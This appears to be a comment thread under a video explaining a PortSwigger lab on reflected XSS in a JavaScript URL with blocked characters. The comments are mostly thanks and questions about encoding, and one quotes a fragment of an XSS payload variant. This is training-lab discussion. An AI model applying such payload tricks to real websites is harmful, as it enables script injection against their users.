Reflected XSS in a JavaScript URL with some characters blocked - Explaining the Payload

Thank you for your exhaustive step-by-step explanation. The PortSwigger explanation is definitely not enough. Your videos allow us to appreciate the tricks used in this exploit.

marcr

You're the best at explaining the lab and XSS—I absolutely love your explanations!

mehrabamv

This is extremely helpful! I am not really familiar enough with js, but i really wanted to understand this lab, and it would be so bad without your explanation. Thank you million times!

pinkypink

Best Explanation Ever !!! Really Crazy and very simple to understand and I wish you the very Best !!!

sabarishAB-yo

this is a god level explanation. Thanks sir🙏🙏

souravpaul_per

Amazing! I would have changed the last 'x' by another letter just to not get confuse with the function x previously defined, for example, , window+'',{a:' also works. Thanks for these videos.

Paul-Dirac

JUST ABSOLUTE CRAZY EXPLAINATION! SUPER SIMPLIFIED!!!

normaliteeos

Thank you so much for this video, everysince I found your channel you have been my savior to understand some of the experts labs. So really thank you so

andre-njx

Really well done course! Thanks for your content!

Mr.Manimal

Dude, This is really great, You are clearly explaining with custom code, thank you

pv

thanks alot man this is great . i mean awesome to give us a detailed explanation🔥

.sayanthsunil

BEAUTIFULLY explained, thank you very much!

mohsinhafeez

Really amazing and detailed explanation! Thank you!

Sofi-pszc

Absolutely splendid explanation, thank you so much

YousefAmmar-td

Thanks a lot! detailed and clear, satisfactory indeed.

akemi-ihky

Thank you! There is one thing that I would like explained. When you pass in the correct query param to solve the lab, and you look at the HTML of the returned response, it does not look like the code passed in the query string was successfully injected. e.g. you do not see an actual single quote to close the value of the body property in the fetch payload. Instead, you see an encoded single quote, which is not valid javascript.

I guess the browser decodes the javascript url before executing it, but I do wonder about that.

scharfer

I could see the reflection point in the source.... that's it then I am for the video.., ...I still couldn't understand why the tostring and window are required in our payload...

pranjalruhela

Thanks for this great explaination♥
I have a question, how does the javascript worked while the equal signs are encoded?

ossamayasser

Nice one I have 1 question and one comment, the question is that how the xss happens when the url is encoded and the payload is also encoded, and the comment is that it's not the parameter that is vulnerable but the url being reflected in the page

neadlead